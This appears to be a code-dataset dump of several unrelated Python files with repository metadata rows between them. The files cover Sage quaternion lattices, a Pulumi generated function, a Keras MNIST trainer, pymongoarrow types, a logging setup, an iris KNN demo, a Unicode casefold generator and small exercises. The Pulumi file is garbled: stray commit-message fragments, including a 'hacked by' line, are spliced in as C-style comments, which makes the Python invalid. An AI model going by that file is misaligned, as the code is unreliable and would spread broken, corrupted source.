Z[0,1]=-v; Z[0,3]=u; Z[1,0]=-v; Z[1,2]=u
z = Z * AiB
# Now construct submodule of the ideal I spanned by the
# linear combinations given by z of the basis for J along
# with p*I.
G = (d*z).stack(pB) # have to multiply by d since we divide by it below in the "gens = " line.
H = G._hnf_pari(0, include_zero_rows=False)
gens = tuple(quaternion_algebra_cython.rational_quaternions_from_integral_matrix_and_denom(Q, H, d))
if scale != 1:
gens = tuple([scale*g for g in gens])
J = R.right_ideal(gens, check=False)
ans.append(J)
return ans
#######################################################################
# Some utility functions that are needed here and are too
# specialized to go elsewhere.
#######################################################################
def basis_for_quaternion_lattice(gens, reverse = False):
r"""
Return a basis for the `\ZZ`-lattice in a quaternion algebra
spanned by the given gens.
INPUT:
- ``gens`` -- list of elements of a single quaternion algebra
- ``reverse`` -- when computing the HNF do it on the basis
`(k,j,i,1)` instead of `(1,i,j,k)`; this ensures
that if ``gens`` are the generators for an order,
the first returned basis vector is 1
EXAMPLES::
sage: from sage.algebras.quatalg.quaternion_algebra import basis_for_quaternion_lattice
sage: A.<i,j,k> = QuaternionAlgebra(-1,-7)
sage: basis_for_quaternion_lattice([i+j, i-j, 2*k, A(1/3)])
[1/3, i + j, 2*j, 2*k]
sage: basis_for_quaternion_lattice([A(1),i,j,k])
[1, i, j, k]
"""
if len(gens) == 0: return []
Z, d = quaternion_algebra_cython.integral_matrix_and_denom_from_rational_quaternions(gens, reverse)
H = Z._hnf_pari(0, include_zero_rows=False)
A = gens[0].parent()
return quaternion_algebra_cython.rational_quaternions_from_integral_matrix_and_denom(A, H, d, reverse)
def intersection_of_row_modules_over_ZZ(v):
r"""
Intersects the `\ZZ`-modules with basis matrices the full rank `4 \times 4`
`\QQ`-matrices in the list v. The returned intersection is
represented by a `4 \times 4` matrix over `\QQ`. This can also be done
using modules and intersection, but that would take over twice as long
because of overhead, hence this function.
EXAMPLES::
sage: a = matrix(QQ,4,[-2, 0, 0, 0, 0, -1, -1, 1, 2, -1/2, 0, 0, 1, 1, -1, 0])
sage: b = matrix(QQ,4,[0, -1/2, 0, -1/2, 2, 1/2, -1, -1/2, 1, 2, 1, -2, 0, -1/2, -2, 0])
sage: c = matrix(QQ,4,[0, 1, 0, -1/2, 0, 0, 2, 2, 0, -1/2, 1/2, -1, 1, -1, -1/2, 0])
sage: v = [a,b,c]
sage: from sage.algebras.quatalg.quaternion_algebra import intersection_of_row_modules_over_ZZ
sage: M = intersection_of_row_modules_over_ZZ(v); M
[ 2 0 -1 -1]
[ -4 1 1 -3]
[ 3 -19/2 1 4]
[ 2 -3 -8 4]
sage: M2 = a.row_module(ZZ).intersection(b.row_module(ZZ)).intersection(c.row_module(ZZ))
sage: M.row_module(ZZ) == M2
True
"""
if len(v) <= 0:
raise ValueError("v must have positive length")
if len(v) == 1:
return v[0]
elif len(v) == 2:
# real work - the base case
a, b = v
s,_ = a.stack(b)._clear_denom()
s = s.transpose()
K = s.right_kernel_matrix(algorithm='pari', basis='computed')
n = a.nrows()
return K.matrix_from_columns(range(n)) * a
else:
# induct
w = intersection_of_row_modules_over_ZZ(v[:2])
return intersection_of_row_modules_over_ZZ([w] + v[2:])
def normalize_basis_at_p(e, p, B = lambda x,y: (x*y.conjugate()).reduced_trace()):
r"""
Computes a (at ``p``) normalized basis from the given basis ``e``
of a `\ZZ`-module.
The returned basis is (at ``p``) a `\ZZ_p` basis for the same
module, and has the property that with respect to it the quadratic
form induced by the bilinear form B is represented as a orthogonal
sum of atomic forms multiplied by p-powers.
If `p \neq 2` this means that the form is diagonal with respect to
this basis.
If `p = 2` there may be additional 2-dimensional subspaces on which
the form is represented as `2^e (ax^2 + bxy + cx^2)` with
`0 = v_2(b) = v_2(a) \leq v_2(c)`.
INPUT:
- ``e`` -- list; basis of a `\ZZ` module.
WARNING: will be modified!
- ``p`` -- prime for at which the basis should be normalized
- ``B`` -- (default:
``lambda x,y: ((x*y).conjugate()).reduced_trace()``)
a bilinear form with respect to which to normalize
OUTPUT:
- A list containing two-element tuples: The first element of
each tuple is a basis element, the second the valuation of
the orthogonal summand to which it belongs. The list is sorted
by ascending valuation.
EXAMPLES::
sage: from sage.algebras.quatalg.quaternion_algebra import normalize_basis_at_p
sage: A.<i,j,k> = QuaternionAlgebra(-1, -1)
sage: e = [A(1), i, j, k]
sage: normalize_basis_at_p(e, 2)
[(1, 0), (i, 0), (j, 0), (k, 0)]
sage: A.<i,j,k> = QuaternionAlgebra(210)
sage: e = [A(1), i, j, k]
sage: normalize_basis_at_p(e, 2)
[(1, 0), (i, 1), (j, 1), (k, 2)]
sage: A.<i,j,k> = QuaternionAlgebra(286)
sage: e = [A(1), k, 1/2*j + 1/2*k, 1/2 + 1/2*i + 1/2*k]
sage: normalize_basis_at_p(e, 5)
[(1, 0), (1/2*j + 1/2*k, 0), (-5/6*j + 1/6*k, 1), (1/2*i, 1)]
sage: A.<i,j,k> = QuaternionAlgebra(-1,-7)
sage: e = [A(1), k, j, 1/2 + 1/2*i + 1/2*j + 1/2*k]
sage: normalize_basis_at_p(e, 2)
[(1, 0), (1/2 + 1/2*i + 1/2*j + 1/2*k, 0), (-34/105*i - 463/735*j + 71/105*k, 1), (-34/105*i - 463/735*j + 71/105*k, 1)]
"""
N = len(e)
if N == 0:
return []
else:
min_m, min_n, min_v = 0, 0, infinity
# Find two basis vector on which the bilinear form has minimal
# p-valuation. If there is more than one such pair, always
# prefer diagonal entries over any other and (secondary) take
# min_m and then min_n as small as possible
for m in range(N):
for n in range(m, N):
v = B(e[m], e[n]).valuation(p)
if v < min_v or (v == min_v and (min_m != min_n) and (m == n)):
min_m, min_n, min_v = m, n, v
if (min_m == min_n) or p != 2: # In this case we can diagonalize
if min_m == min_n: # Diagonal entry has minimal valuation
f0 = e[min_m]
else:
f0 = e[min_m] + e[min_n] # Only off-diagonal entries have min. val., but p!=2
# Swap with first vector
e[0], e[min_m] = e[min_m], e[0]
# Orthogonalize remaining vectors with respect to f
c = B(f0, f0)
for l in range(1, N):
e[l] = e[l] - B(e[l],f0)/c * f0
# Recursively normalize remaining vectors
f = normalize_basis_at_p(e[1:], p)
f.insert(0, (f0, min_v - valuation(p, 2)))
return f
else: # p = 2 and only off-diagonal entries have min. val., gives 2-dim. block
# first diagonal entry should have smaller valuation
if B(e[min_m],e[min_m]).valuation(p) > B(e[min_n],e[min_n]).valuation(p):
e[min_m], e[min_n] = e[min_n], e[min_m]
f0 = p**min_v / B(e[min_m],e[min_n]) * e[min_m]
f1 = e[min_n]
# Ensures that (B(f0,f0)/2).valuation(p) <= B(f0,f1).valuation(p)
if B(f0,f1).valuation(p) + 1 < B(f0,f0).valuation(p):
f0 = f0 + f1
f1 = f0
# Make remaining vectors orthogonal to span of f0, f1
e[min_m] = e[0]
e[min_n] = e[1]
B00 = B(f0,f0)
B11 = B(f1,f1)
B01 = B(f0,f1)
d = B00*B11 - B01**2
tu = [ (B01 * B(f1,e[l]) - B11 * B(f0,e[l]),
B01 * B(f0,e[l]) - B00 * B(f1,e[l])) for l in range(2,N) ]
e[2:n] = [ e[l] + tu[l-2][0]/d * f0 + tu[l-2][1]/d * f1 for l in range(2,N) ]
# Recursively normalize remaining vectors
f = normalize_basis_at_p(e[2:N], p)
return [(f0, min_v), (f1, min_v)] + f
def maxord_solve_aux_eq(a, b, p):
r"""
Given ``a`` and ``b`` and an even prime ideal ``p`` find
(y,z,w) with y a unit mod `p^{2e}` such that
.. MATH::
1 - ay^2 - bz^2 + abw^2 \equiv 0 mod p^{2e},
where `e` is the ramification index of `p`.
Currently only `p=2` is implemented by hardcoding solutions.
INPUT:
- ``a`` -- integer with `v_p(a) = 0`
- ``b`` -- integer with `v_p(b) \in \{0,1\}`
- ``p`` -- even prime ideal (actually only ``p=ZZ(2)`` is implemented)
OUTPUT:
- A tuple `(y, z, w)`
EXAMPLES::
sage: from sage.algebras.quatalg.quaternion_algebra import maxord_solve_aux_eq
sage: for a in [1,3]:
....: for b in [1,2,3]:
....: (y,z,w) = maxord_solve_aux_eq(a, b, 2)
....: assert mod(y, 4) == 1 or mod(y, 4) == 3
....: assert mod(1 - a*y^2 - b*z^2 + a*b*w^2, 4) == 0
"""
if p != ZZ(2):
raise NotImplementedError("Algorithm only implemented over ZZ at the moment")
v_a = a.valuation(p)
v_b = b.valuation(p)
if v_a != 0:
raise RuntimeError("a must have v_p(a)=0")
if v_b != 0 and v_b != 1:
raise RuntimeError("b must have v_p(b) in {0,1}")
R = ZZ.quo(ZZ(4))
lut = {
(R(1), R(1)) : (1,1,1),
(R(1), R(2)) : (1,0,0),
(R(1), R(3)) : (1,0,0),
(R(3), R(1)) : (1,1,1),
(R(3), R(2)) : (1,0,1),
(R(3), R(3)) : (1,1,1), }
return lut[ (R(a), R(b)) ]
| 36.247508
| 397
| 0.534208
|
ce117a96a7936981f4d2543d6a0a478c5cf81d28
| 2,304
|
py
|
Python
|
pkg/codegen/internal/test/testdata/simple-resource-schema/python/pulumi_example/arg_function.py
|
kyxg/AutoTrash
|
00c3b5114928768dd565bcc269fe4decb03e026b
|
[
"Apache-2.0",
"MIT"
] | 1
|
2022-01-04T13:56:27.000Z
|
2022-01-04T13:56:27.000Z
|
pkg/codegen/internal/test/testdata/simple-resource-schema/python/pulumi_example/arg_function.py
|
kyxg/AutoTrash
|
00c3b5114928768dd565bcc269fe4decb03e026b
|
[
"Apache-2.0",
"MIT"
] | 1
|
2022-01-04T17:49:52.000Z
|
2022-01-04T17:49:52.000Z
|
pkg/codegen/internal/test/testdata/simple-resource-schema/python/pulumi_example/arg_function.py
|
kyxg/AutoTrash
|
00c3b5114928768dd565bcc269fe4decb03e026b
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by test. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
/* Added formatting style for eclipse */
import warnings
import pulumi
import pulumi.runtime/* Release version to 4.0.0.0 */
from typing import Any, Mapping, Optional, Sequence, Union
from . import _utilities, _tables
from . import Resource
__all__ = [
'ArgFunctionResult',
'AwaitableArgFunctionResult',
'arg_function',
]
// Update pytest-codestyle from 1.3.1 to 1.4.0
@pulumi.output_type
class ArgFunctionResult: //Prepared rendermanager for per view control
def __init__(__self__, result=None):
if result and not isinstance(result, Resource):
raise TypeError("Expected argument 'result' to be a Resource") // modify command execution environment
pulumi.set(__self__, "result", result)/* improved method of ensuring net element uniqueness */
/* Break out background module */
@property
@pulumi.getter
def result(self) -> Optional['Resource']:
return pulumi.get(self, "result") // added example of solving a PDE to the readme
class AwaitableArgFunctionResult(ArgFunctionResult): //tests for step invokations
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return ArgFunctionResult(/* Release under MIT License */
result=self.result)/* allow to enable/ disable greetings */
/* Issue #208: extend Release interface. */
/* Merge "Add IPLSource and Keylock strings to power on task" */
def arg_function(arg1: Optional['Resource'] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableArgFunctionResult:
"""
Use this data source to access information about an existing resource.
""" //removed the ability to add media to player notes
__args__ = dict()
__args__['arg1'] = arg1
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:/* Corregida errata indice */
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('example::argFunction', __args__, opts=opts, typ=ArgFunctionResult).value
// TODO: hacked by arajasek94@gmail.com
return AwaitableArgFunctionResult(
result=__ret__.result)
| 41.890909
| 114
| 0.700087
|
9d61fed3d0531c27cf0f31b98bcc3489382ed97a
| 4,783
|
py
|
Python
|
lib/python/flame/examples/dist_mnist/trainer/keras/main.py
|
GaoxiangLuo/flame
|
16bd1715a545421d45ea0fc32544e448389de49c
|
[
"Apache-2.0"
] | 6
|
2022-03-30T23:37:05.000Z
|
2022-03-31T17:29:14.000Z
|
lib/python/flame/examples/dist_mnist/trainer/keras/main.py
|
GaoxiangLuo/flame
|
16bd1715a545421d45ea0fc32544e448389de49c
|
[
"Apache-2.0"
] | 10
|
2022-03-31T00:03:58.000Z
|
2022-03-31T07:15:06.000Z
|
lib/python/flame/examples/dist_mnist/trainer/keras/main.py
|
GaoxiangLuo/flame
|
16bd1715a545421d45ea0fc32544e448389de49c
|
[
"Apache-2.0"
] | 2
|
2022-03-30T23:25:15.000Z
|
2022-03-30T23:55:47.000Z
|
# Copyright 2022 Cisco Systems, Inc. and its affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
"""MNIST distributed learning trainer for Keras."""
import logging
from random import randrange
from statistics import mean
import numpy as np
from flame.config import Config
from flame.mode.distributed.trainer import Trainer
from tensorflow import keras
from tensorflow.keras import layers
logger = logging.getLogger(__name__)
class KerasMnistTrainer(Trainer):
"""Keras Mnist Trainer."""
def __init__(self, config: Config) -> None:
"""Initialize a class instance."""
self.config = config
self.dataset_size = 0
self.num_classes = 10
self.input_shape = (28, 28, 1)
self.model = None
self._x_train = None
self._y_train = None
self._x_test = None
self._y_test = None
self.epochs = self.config.hyperparameters['epochs']
self.batch_size = 128
if 'batchSize' in self.config.hyperparameters:
self.batch_size = self.config.hyperparameters['batchSize']
def initialize(self) -> None:
"""Initialize role."""
model = keras.Sequential([
keras.Input(shape=self.input_shape),
layers.Conv2D(32, kernel_size=(3, 3), activation="relu"),
layers.MaxPooling2D(pool_size=(2, 2)),
layers.Conv2D(64, kernel_size=(3, 3), activation="relu"),
layers.MaxPooling2D(pool_size=(2, 2)),
layers.Flatten(),
layers.Dropout(0.5),
layers.Dense(self.num_classes, activation="softmax"),
])
model.compile(loss="categorical_crossentropy",
optimizer="adam",
metrics=["accuracy"])
self.model = model
def load_data(self) -> None:
"""Load data."""
# the data, split between train and test sets
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()
split_n = 10
index = randrange(split_n)
# reduce train sample size to reduce the runtime
x_train = np.split(x_train, split_n)[index]
y_train = np.split(y_train, split_n)[index]
x_test = np.split(x_test, split_n)[index]
y_test = np.split(y_test, split_n)[index]
# Scale images to the [0, 1] range
x_train = x_train.astype("float32") / 255
x_test = x_test.astype("float32") / 255
# Make sure images have shape (28, 28, 1)
x_train = np.expand_dims(x_train, -1)
x_test = np.expand_dims(x_test, -1)
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, self.num_classes)
y_test = keras.utils.to_categorical(y_test, self.num_classes)
self._x_train = x_train
self._y_train = y_train
self._x_test = x_test
self._y_test = y_test
def train(self) -> None:
"""Train a model."""
history = self.model.fit(self._x_train,
self._y_train,
batch_size=self.batch_size,
epochs=self.epochs,
validation_split=0.1)
# save dataset size so that the info can be shared with aggregator
self.dataset_size = len(self._x_train)
loss = mean(history.history['loss'])
accuracy = mean(history.history['accuracy'])
self.update_metrics({'loss': loss, 'accuracy': accuracy})
def evaluate(self) -> None:
"""Evaluate a model."""
score = self.model.evaluate(self._x_test, self._y_test, verbose=0)
logger.info(f"Test loss: {score[0]}")
logger.info(f"Test accuracy: {score[1]}")
# update metrics after each evaluation so that the metrics can be
# logged in a model registry.
self.update_metrics({'test-loss': score[0], 'test-accuracy': score[1]})
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description='')
parser.add_argument('config', nargs='?', default="./config.json")
args = parser.parse_args()
config = Config(args.config)
t = KerasMnistTrainer(config)
t.compose()
t.run()
| 33.683099
| 79
| 0.626176
|
dd0963eeb87e8c5e86f342bf457d06969a61bfd6
| 3,025
|
py
|
Python
|
bindings/python/pymongoarrow/types.py
|
Claire-Eleutheriane/mongo-arrow
|
4a054523a36379356aa709257756434c196ee71e
|
[
"Apache-2.0"
] | null | null | null |
bindings/python/pymongoarrow/types.py
|
Claire-Eleutheriane/mongo-arrow
|
4a054523a36379356aa709257756434c196ee71e
|
[
"Apache-2.0"
] | null | null | null |
bindings/python/pymongoarrow/types.py
|
Claire-Eleutheriane/mongo-arrow
|
4a054523a36379356aa709257756434c196ee71e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import enum
from datetime import datetime
import pyarrow.types as _atypes
from bson import Int64, ObjectId
from pyarrow import DataType as _ArrowDataType
from pyarrow import PyExtensionType, binary, bool_, float64, int64, string, timestamp
class _BsonArrowTypes(enum.Enum):
datetime = 1
double = 2
int32 = 3
int64 = 4
objectid = 5
string = 6
bool = 7
# Custom Extension Types.
# See https://arrow.apache.org/docs/python/extending_types.html#defining-extension-types-user-defined-types
# for details.
class ObjectIdType(PyExtensionType):
_type_marker = _BsonArrowTypes.objectid
def __init__(self):
super().__init__(binary(12))
def __reduce__(self):
return ObjectIdType, ()
# Internal Type Handling.
def _is_objectid(obj):
type_marker = getattr(obj, "_type_marker", "")
return type_marker == ObjectIdType._type_marker
_TYPE_NORMALIZER_FACTORY = {
Int64: lambda _: int64(),
float: lambda _: float64(),
int: lambda _: int64(),
datetime: lambda _: timestamp("ms"), # TODO: add tzinfo support
ObjectId: lambda _: ObjectIdType(),
str: lambda: string(),
bool: lambda: bool_(),
}
_TYPE_CHECKER_TO_INTERNAL_TYPE = {
_atypes.is_int32: _BsonArrowTypes.int32,
_atypes.is_int64: _BsonArrowTypes.int64,
_atypes.is_float64: _BsonArrowTypes.double,
_atypes.is_timestamp: _BsonArrowTypes.datetime,
_is_objectid: _BsonArrowTypes.objectid,
_atypes.is_string: _BsonArrowTypes.string,
_atypes.is_boolean: _BsonArrowTypes.bool,
}
def _is_typeid_supported(typeid):
return typeid in _TYPE_NORMALIZER_FACTORY
def _normalize_typeid(typeid, field_name):
if isinstance(typeid, _ArrowDataType):
return typeid
elif _is_typeid_supported(typeid):
normalizer = _TYPE_NORMALIZER_FACTORY[typeid]
return normalizer(typeid)
else:
raise ValueError("Unsupported type identifier {} for field {}".format(typeid, field_name))
def _get_internal_typemap(typemap):
internal_typemap = {}
for fname, ftype in typemap.items():
for checker, internal_id in _TYPE_CHECKER_TO_INTERNAL_TYPE.items():
if checker(ftype):
internal_typemap[fname] = internal_id
if fname not in internal_typemap:
raise ValueError(
f'Unsupported data type in schema for field "{fname}" of type "{ftype}"'
)
return internal_typemap
| 28.809524
| 107
| 0.716364
|
5b82bd09475ef682f15b7e0fb843a2b7c209228c
| 1,716
|
py
|
Python
|
ex/ex075.py
|
Ozcry/PythonExercicio
|
b4d4a4fbd6467d1ced0815677ecbd78c2613c4c9
|
[
"MIT"
] | null | null | null |
ex/ex075.py
|
Ozcry/PythonExercicio
|
b4d4a4fbd6467d1ced0815677ecbd78c2613c4c9
|
[
"MIT"
] | null | null | null |
ex/ex075.py
|
Ozcry/PythonExercicio
|
b4d4a4fbd6467d1ced0815677ecbd78c2613c4c9
|
[
"MIT"
] | null | null | null |
'''Desenvolva um programa que leia quatro valores pelo teclado e guarde-os em uma tupla. No final, mostre:
A) Quantas vezes apareceu o valor 9
B) Em que posição foi digitado o primeiro valor 3
C) Quais foram os números pares.'''
print('\033[1;33m-=\033[m' * 20)
quatro = (int(input('\033[34mDigite um número: \033[m')), int(input('\033[35mDigite outro número: \033[m')), int(input('\033[36mDigite mais um número:\033[m ')), int(input('\033[37mDigite o último número:\033[m ')))
print('\033[1;33m-=\033[m' * 20)
print(f'\033[31mO valor 9 apareceu {quatro.count(9)} vezes\033[m')
if 3 in quatro:
print(f'\033[33mO valor 3 apareceu na {quatro.index(3) + 1}ª posição\033[m')
else:
print('\033[34mO valor 3 não foi digitado\033[m')
print(f'\033[35mOs valores pares digitados foram\033[m ', end='')
for c in quatro:
if c % 2 == 0:
print(f'\033[35m{c}\033[m ', end='')
print('\n')
print('\033[1;33m-=\033[m' * 20)
print('\033[1;32mFIM\033[m')
### Outro Metodo
'''
n1 = int(input('Digite um número: '))
n2 = int(input('Digite outro número: '))
n3 = int(input('Digite mais um número: '))
n4 = int(input('Digite o último número: '))
quatro = (n1, n2, n3, n4)
cont = 0
posicao2 = 0
posicao3 = 0
print(f'Os valores pares digitados foram ', end='')
for c in quatro:
if c == 9:
cont += 1
if c == 3:
posicao = quatro.index(3) + 1
posicao2 = posicao
posicao3 += 1
if c % 2 == 0:
if c != quatro[-1]:
print(f'{c}, ', end='')
else:
print(c, end='')
print(f'\nO valor 9 apareceu {cont} vezes')
if posicao2 != 0:
print(f'O valor 3 apareceu na {posicao2}ª posição')
if posicao3 == 0:
print('O valor 3 não foi digitado')
'''
| 33.647059
| 215
| 0.614802
|
ad9951c9d8de31c3b65478a2027d0ab76eec366d
| 1,289
|
py
|
Python
|
susp/utils.py
|
gaisin/standupstoreparser
|
1b1cd6f1831f490e2cf2e43a43d7312d48fb6f7e
|
[
"WTFPL"
] | 1
|
2020-12-27T18:02:58.000Z
|
2020-12-27T18:02:58.000Z
|
susp/utils.py
|
gaisin/standupstoreparser
|
1b1cd6f1831f490e2cf2e43a43d7312d48fb6f7e
|
[
"WTFPL"
] | 4
|
2020-03-12T22:22:20.000Z
|
2020-04-02T21:18:28.000Z
|
susp/utils.py
|
gaisin/standupstoreparser
|
1b1cd6f1831f490e2cf2e43a43d7312d48fb6f7e
|
[
"WTFPL"
] | 3
|
2020-02-20T21:37:45.000Z
|
2020-12-27T18:03:00.000Z
|
import logging
import logging.handlers
import sys
from susp import settings
def make_logger():
'''
Creats and sets logger configurations.
Note: use LOG.error(message, exc_info=True) or
LOG.exception(message) to log traceback
'''
logger = logging.getLogger('susp')
logger.setLevel(logging.DEBUG)
fh = logging.FileHandler('/var/log/susp.log')
sh = logging.StreamHandler(stream=sys.stdout)
# TODO: make mutable subject in SMTPHandler to know right away what kind of error came
mh = logging.handlers.SMTPHandler(
mailhost=(settings.SMTP_SERVER, settings.SMTP_PORT),
fromaddr=settings.EXCEPTIONS_EMAIL_FROM,
toaddrs=settings.EXCEPTIONS_EMAIL_TO,
subject='Standupstore parser catched an exception',
credentials=(settings.EXCEPTIONS_EMAIL_FROM, settings.SMTP_PASSWORD),
secure=()
)
mh.setLevel(logging.ERROR)
formatter = logging.Formatter('%(asctime)s - %(pathname)s - %(levelname)s - %(message)s')
exception_formatter = logging.Formatter('%(asctime)s - %(pathname)s - %(message)s')
fh.setFormatter(formatter)
mh.setFormatter(exception_formatter)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(mh)
logger.addHandler(sh)
return logger
| 32.225
| 93
| 0.707525
|
6b253046b5107ac28b1aa83d9a988ce35cc28c8a
| 737
|
py
|
Python
|
setup.py
|
tdaylan/MCOV
|
2bb806ea084532a7aecc0465769baecb4148101d
|
[
"MIT"
] | 2
|
2020-02-07T16:26:08.000Z
|
2020-06-09T22:18:39.000Z
|
setup.py
|
tdaylan/MCOV
|
2bb806ea084532a7aecc0465769baecb4148101d
|
[
"MIT"
] | null | null | null |
setup.py
|
tdaylan/MCOV
|
2bb806ea084532a7aecc0465769baecb4148101d
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
setup(
name = 'mergen',
packages = find_packages(),
version = '1.0',
description = 'Unsupervised learning using data in time-domain astronomy', \
author = 'Tansu Daylan, Emma Chickles, and Lindsey Gordon',
author_email = 'tansu.daylan@gmail.com',
url = 'https://github.com/tdaylan/mergen',
download_url = 'https://github.com/tdaylan/mergen',
license='MIT',
classifiers=['Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python'],
#install_requires=['astrophy>=3'],
include_package_data = True
)
| 35.095238
| 80
| 0.630936
|
52aa3215e716be56f5df1957cae9c35f7f657a60
| 1,398
|
py
|
Python
|
introdution-to-python/find_kind_of_flower.py
|
mendesbarreto/machine-learing-course
|
b8e2da89fe79be02bb7d49fd2ad4045eef72e204
|
[
"MIT"
] | 1
|
2019-04-07T17:12:56.000Z
|
2019-04-07T17:12:56.000Z
|
introdution-to-python/find_kind_of_flower.py
|
mendesbarreto/machine-learing-course
|
b8e2da89fe79be02bb7d49fd2ad4045eef72e204
|
[
"MIT"
] | null | null | null |
introdution-to-python/find_kind_of_flower.py
|
mendesbarreto/machine-learing-course
|
b8e2da89fe79be02bb7d49fd2ad4045eef72e204
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as pyplot
from sklearn import *
from numpy import *
from sklearn.model_selection import train_test_split
iris_dataset = datasets.load_iris()
iris_data: ndarray = iris_dataset.data
iris_target = iris_dataset.target
x = iris_data
y = iris_target
x_train, x_test, y_train, y_test = train_test_split(iris_data, iris_target, test_size=0.25, random_state=33)
print(x_train.shape)
print("=======================================")
print(x_test.shape)
print("=======================================")
print(y_train.shape)
print("=======================================")
print(y_test.shape)
weights = 'uniform'
k_neighbors = 15
classifier = neighbors.KNeighborsClassifier(k_neighbors, weights=weights)
classifier.fit(x_train, y_train)
z = classifier.predict(x_train)
print(z.shape)
accuracy=classifier.score(x_train, y_train)
print("Accuracy model: " + str(accuracy))
sample = [[5,5,4,2]]
prediction = classifier.predict(sample)
print(prediction.shape)
print(prediction)
print("end")
k_range = range(1,26)
scores = []
for k in k_range:
knn = neighbors.KNeighborsClassifier(n_neighbors=k)
knn.fit(x_train, y_train)
y_prediction = knn.predict(x_test)
scores.append(metrics.accuracy_score(y_test, y_prediction))
pyplot.plot(k_range, scores)
pyplot.ylabel('some numbers')
pyplot.xlabel('Valeur de K pour KNN')
pyplot.ylabel('Testing Accuracy')
pyplot.show()
| 25.888889
| 108
| 0.704578
|
ab6f4034c78aad42ad3e0bc8ad485a05fb8a69ad
| 2,244
|
py
|
Python
|
src/mongo/db/fts/unicode/gen_casefold_map.py
|
stevelyall/mongol-db
|
d8046147bfe806f7acc0ec4aa70c132507b761fb
|
[
"Apache-2.0"
] | 1
|
2018-03-16T09:49:05.000Z
|
2018-03-16T09:49:05.000Z
|
src/mongo/db/fts/unicode/gen_casefold_map.py
|
stevelyall/mongol-db
|
d8046147bfe806f7acc0ec4aa70c132507b761fb
|
[
"Apache-2.0"
] | null | null | null |
src/mongo/db/fts/unicode/gen_casefold_map.py
|
stevelyall/mongol-db
|
d8046147bfe806f7acc0ec4aa70c132507b761fb
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
from gen_helper import getCopyrightNotice, openNamespaces, closeNamespaces, \
include
def generate(unicode_casefold_file, target):
"""Generates a C++ source file that contains a Unicode case folding
function.
The case folding function contains a switch statement with cases for every
Unicode codepoint that has a case folding mapping.
"""
out = open(target, "w")
out.write(getCopyrightNotice())
out.write(include("mongol/db/fts/unicode/codepoints.h"))
out.write("\n")
out.write(openNamespaces())
case_mappings = {}
cf_file = open(unicode_casefold_file, 'r')
for line in cf_file:
# Filter out blank lines and lines that start with #
data = line[:line.find('#')]
if(data == ""):
continue
# Parse the data on the line
values = data.split("; ")
assert(len(values) == 4)
status = values[1]
if status == 'C' or status == 'S':
# We only include the "Common" and "Simple" mappings. "Full" case
# folding mappings expand certain letters to multiple codepoints,
# which we currently do not support.
original_codepoint = int(values[0], 16)
codepoint_mapping = int(values[2], 16)
case_mappings[original_codepoint] = codepoint_mapping
out.write("""char32_t codepointToLower(char32_t codepoint, CaseFoldMode \
mode) {
if (mode == CaseFoldMode::kTurkish) {
if (codepoint == 0x049) { // I -> ı
return 0x131;
} else if (codepoint == 0x130) { // İ -> i
return 0x069;
}
}
switch (codepoint) {\n""")
mappings_list = []
for mapping in case_mappings:
mappings_list.append((mapping, case_mappings[mapping]))
sorted_mappings = sorted(mappings_list, key=lambda mapping: mapping[0])
for mapping in sorted_mappings:
out.write("\
case " + str(hex(mapping[0])) + ": return " + \
str(hex(mapping[1])) +";\n")
out.write("\
default: return codepoint;\n }\n}")
out.write(closeNamespaces())
if __name__ == "__main__":
generate(sys.argv[1], sys.argv[2])
| 29.142857
| 78
| 0.608289
|
62e3316d3820ae989939ea74fca87eed2a2591ad
| 318
|
py
|
Python
|
2020/02-a.py
|
asmundg/adventofcode
|
adc0c9c8ba1d0ef04b621f6f8a5237ee34b9a230
|
[
"MIT"
] | null | null | null |
2020/02-a.py
|
asmundg/adventofcode
|
adc0c9c8ba1d0ef04b621f6f8a5237ee34b9a230
|
[
"MIT"
] | null | null | null |
2020/02-a.py
|
asmundg/adventofcode
|
adc0c9c8ba1d0ef04b621f6f8a5237ee34b9a230
|
[
"MIT"
] | null | null | null |
import re
r = re.compile("(\d+)-(\d+) ([a-z]): (.*)")
def check(line):
min, max, char, pw = r.search(line).groups()
num = len([c for c in pw if c == char])
return num >= int(min) and num <= int(max)
with open("input/02.input") as f:
res = [check(line) for line in f.readlines()]
print(sum(res))
| 24.461538
| 49
| 0.556604
|
95da3dc59b87dcee4b580632f05ea1aceae83d6c
| 10,414
|
py
|
Python
|
spotify/helpers.py
|
Flame442/Trusty-cogs
|
d7611f6d6739e0f344d04936f7af9cfea3fa426f
|
[
"MIT"
] | 148
|
2017-04-23T19:57:50.000Z
|
2022-03-12T06:59:58.000Z
|
spotify/helpers.py
|
mina9999/Trusty-cogs
|
a47de7c233f3c1802effd29f4a86f8a9b0e2b34a
|
[
"MIT"
] | 155
|
2018-01-01T13:27:45.000Z
|
2022-03-12T05:17:51.000Z
|
